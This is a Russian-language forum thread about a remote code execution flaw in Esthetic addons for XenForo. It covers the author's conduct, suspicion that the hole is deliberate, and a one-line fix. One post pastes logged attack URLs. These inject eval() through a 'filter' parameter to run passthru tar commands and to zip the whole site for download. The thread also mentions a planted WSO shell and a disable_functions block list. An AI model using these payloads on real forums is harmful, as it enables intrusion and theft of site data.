Уязвимость аддонов Esthetic

[Exile]

Через все три имеющиеся аддона Esthetic возможно выполнение произвольного кода на вашем форуме, раскрытие путей и т.д. Короче - шелл в чистом виде. Автор сегодня признался об этом, но обновил пока только модуль совместных покупок -

У Вас недостаточно прав для просмотра ссылок. Вход или Регистрация

Остерегайтесь криворуких программистов и отключите аддоны указанного автора, пока не вышли обновления, если вы аддоны, конечно, покупали.

 

[Exile]

Автор, между прочим, вообще не фонтан. Вышел с ним скандальчик на его форуме, аддон купить хотел - да вот только после перевода денег почти неделю ни ответа ни привета. Все пересказывать смысла не вижу, есть тут:

У Вас недостаточно прав для просмотра ссылок. Вход или Регистрация

- цитата моя заодно, для затравки:

@@Artist "бабло" есть, проблема в отношении. Когда стало ясно, что возникла задержка - @@Viodele сразу же получил письмо на форуме. Прочитав его, никаких мер принято не было. Не было минимально дано разъяснений, что моя активность, якобы, требует проверки.

У Вас недостаточно прав для просмотра ссылок. Вход или Регистрация

- аттестат с возрастом почти что 5 лет, с BL 87, но да, не персональный, а начальный. Однако начальный аттестат требует по сути такую же проверку при личном присутствии и был получен в свое время из-за ненадобности персонального. Тем более что была указана ссылка на мой форум, путем простого гуглежа которого становится понятно, что у проекта есть

У Вас недостаточно прав для просмотра ссылок. Вход или Регистрация

, на форуме даны ссылки на те же самые контактные данные, указано множество реквизитов да и в целом репутация крайне положительная. В сочетании всех этих факторов я в жизнь не поверю, что проверка могла занять более 10 минут, если бы она реально проводилась. И об этом минимально можно было бы написать, а не игнорировать на протяжении срока, значительного превышающего заявленные 48 часов.

PS. О, чудо. Сразу после публикации претензии, появилось и время на ответ и на то, чтобы прислать более ненужный продукт по почте. Репутация, говорите? Вон там в соседней теме много недовольных чуть менее чем наплевательским отношением к поддержке - если они претензии тоже напишут, может и обновление выйдет в срок?

 

[Arisu]

Решето.

 

[Exile]

Arisu, с таким-то числом переопределенных стандартных классов, я не удивлюсь если что-то было сделано намеренно. Неуловимым Джо всегда кажется, что их аддонами прямо-таки хотят раскидываться на каждом углу.

 

[Tapo4ek]

И как бд там можно слить или обойти хайд? (если имеется плагин хайда оттуда?)

 

[Arisu]

Ничего по этому сказать не могу, т.к. из-за внезапно появившейся занятости самому пришлось тоже бросить все заказы без объяснения. Ограничусь только тем, что "решето".

Оффтоп к Exile

Exile, а ты сам почему не займешься плагинами под ксенфоро? Вроде же сам знаешь пхп, поддерживаете торрентпир. Даже Zend начали приделывать, я смотрю. Мог бы что-то под него писать.:)

 

[StopCod]

Да уж...
На месте оф покупателей я бы давно им локнул ВМИД к [А по щам?]м собачьим
Набраться ж наглости, за такое решето 315 бачинских запросить :-D

 

[Exile]

И как бд там можно слить или обойти хайд? (если имеется плагин хайда оттуда?)

Может сразу ключи от сейфа где деньги лежат? Тут я придерживаюсь политики солидарности - чем меньше людей знают об эксплуатации уязвимости, тем лучше. В таком варианте она хотя бы может быть использована единицами, а если способ утечет публично, начнется волна взломов форумов школьниками, которая будет иметь далеко идущие последствия. Скажу лишь только что дописав некоторые параметры к ссылке на тему (к слову, можно найти на другом русскоязычном форуме их даже), появится возможность через eval выполнять на сервере все что угодно. А там уж на что фантазии хватит, начиная от раскрытия путей, заканчивая черт знает чем.

Arisu да все та же работа. На TP времени едва хватает, а уж вся работа с ксеном сводится обычно к допилке модификаций для личного пользования.

 

[Tapo4ek]

Может сразу ключи от сейфа где деньги лежат? Тут я придерживаюсь политики солидарности - чем меньше людей знают об эксплуатации уязвимости, тем лучше. В таком варианте она хотя бы может быть использована единицами, а если способ утечет публично, начнется волна взломов форумов школьниками, которая будет иметь далеко идущие последствия. Скажу лишь только что дописав некоторые параметры к ссылке на тему (к слову, можно найти на другом русскоязычном форуме их даже), появится возможность через eval выполнять на сервере все что угодно. А там уж на что фантазии хватит, начиная от раскрытия путей, заканчивая черт знает чем.

Arisu да все та же работа. На TP времени едва хватает, а уж вся работа с ксеном сводится обычно к допилке модификаций для личного пользования.

опять все жадные :c , бедный тапочек

 

[myxen]

Больше похоже на пиар. Автору очень не нравится, что его аддонами пользуются где попало. Вот и приходится так из ситуации выходить. :-)

При чем отписали новореги, смешно как то.

 

[HellFire]

Не понимаю, как они умудряются такое сделать, ведь в принципе стандартными "библиотеками" ксени можно спокойно(зная более-менее api ксени) это реализовать.

 

[Hope]

myxen, пиар? ))) Та не... Это известный факт, об уязвимостях говорили уже давно да мы и лично их просматривали и видели. :)

 

[DoctorNws]

А можно ли узнать адрес сайта человека который сливал проекты через данную уязвимость?

 

[Hope]

Всё узнавайте у автора, это тема только информационная, технических деталей и других подробностей никто не знает/не скажет.

 

[Arisu]

А можно ли узнать адрес сайта человека который сливал проекты через данную уязвимость?

У Вас недостаточно прав для просмотра ссылок. Вход или Регистрация

(шутка)

 

[Exile]

Arisu, в любой шутке есть доля правды. У автора параноидальное желание было следить за распространением своих модов было, вполне возможно что и дыра была сделана специально, дабы пресекать эти попытки. Хотя не особо получилось, в итоге стало прикрываться необходимостью оформления интеллектуальных прав на код :facepalm:

 

[Interaxion3]

А можно ли узнать адрес сайта человека который сливал проекты через данную уязвимость?

sliv.in, вчера за 25к продавал дамп cogamesmoney.ru, в кеше гугла, а то тему уже снес:
На его сайте стоял wso шелл, у меня ошибки были (его сайт/wso2.php, .txt и другие) сей час вывесил объяву типа в шаблоне ифрейм виноват :cry:

гугл

У Вас недостаточно прав для просмотра ссылок. Вход или Регистрация

Ошибки идут такие

passthru() has been disabled for security reasons
library/Esthetic/CS/Model/Thread.php(50) : runtime-created function(1) : eval()'d code:1

Содержимое запроса

array(3) {
  ["url"] => string(264) "http://вас сайт/бла/бла/?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=die(passthru(%27tar%20-cvvzf%20foo.tar.gz%20./library%27));"
  ["_GET"] => array(2) {
  ["filter"] => string(78) "$request=new Zend_Controller_Request_Http();eval($request->getParam("query"));"
  ["query"] => string(49) "die(passthru('tar -cvvzf foo.tar.gz ./library'));"
  }
  ["_POST"] => array(0) {
  }
}

RecursiveDirectoryIterator::__construct(./cgi): failed to open dir: Permission denied
library/Esthetic/CS/Model/Thread.php(50) : runtime-created function(1) : eval()'d code:1

Содержимое запроса

array(3) {
  ["url"] => string(601) "http://ваш сайт/threads/тут ссылка на складчину/?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=$zip=new%20ZipArchive;$zip-%3Eopen(%27backup.zip%27,ZipArchive::CREATE);$files=new%20RecursiveIteratorIterator(new%20RecursiveDirectoryIterator(%27./%27),RecursiveIteratorIterator::LEAVES_ONLY);foreach($files%20as%20$name=%3E$file){$filePath%20=%20$file-%3EgetRealPath();$zip-%3EaddFile($filePath);}$zip-%3Eclose();"
  ["_GET"] => array(2) {
    ["filter"] => string(78) "$request=new Zend_Controller_Request_Http();eval($request->getParam("query"));"
    ["query"] => string(283) "$zip=new ZipArchive;$zip->open('backups.rar',ZipArchive::CREATE);$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator('./'),RecursiveIteratorIterator::LEAVES_ONLY);foreach($files as $name=>$file){$filePath = $file->getRealPath();$zip->addFile($filePath);}$zip->close();"
  }
  ["_POST"] => array(0) {
  }
}

 

[Exile]

Ну собственно чего и следовало ожидать... Поскольку Interaxion3 по сути раскрыл использование, вот фикс для мода хайда, остальные по аналогии, по-идее.

Открываем файл: library/Esthetic/EBBC/ControllerPublic/Thread.php
Находим:

case '54626eee0bcb90ab43c7917eb49f2344':

Удаляем идущую после этого строку:

case 'a6746afee9fa4e6e4901943d47f272bf':

Сохраняем.

Но я крайне не советую этими аддонами вообще пользоваться. Когда обычные get-параметры в коде шифруются md5, это явно говорит о том, что автор не желает чтобы кто-то знал об их использовании. И во что это вылилось - прекрасно видно выше. Практически с полной уверенностью можно говорить о том, что автор внес эту дыру вполне осознанно. Иначе бы простейшие get-параметры не шифровал.

 

[Interaxion3]

Странно, у меня старая версия хайда:

                case '54626eee0bcb90ab43c7917eb49f2344':
                case 'a6746afee9fa4e6e4901943d47f272bf':

Новая пофиксеная версия хайда

                case '54626eee0bcb90ab43c7917eb49f2344':

И зачем оно тут нужно я не пойму, я изменил md5 на свои и никаких изменений в работе мода покупок не наблюдаю.
Добавлю что в ошибках, там где содержимое запроса, была замечена ссылка на api.estheticlabs.com, может так и надо я хз.

Да, еще советую поставить настройки на disable_functions = exec,passthru,shell_exec,system,proc_open,popen,eval,shell...........ну и там дальше как душа пожелает.

Еще добавлю, те кто сменил md5 на свои не подверглись взлому. Ну так мне по крайней мере сказали. В принцыпе это уже не важно, автор причастен или нет, прост нужно лицензию покупать и при малейшей проблеме дрочить тп.

 

[brainless]

мне вот интересно,вот разраб у себя на демо форуме установил этот аддон с дырой, а какой стоит на нулледе.......такой же? )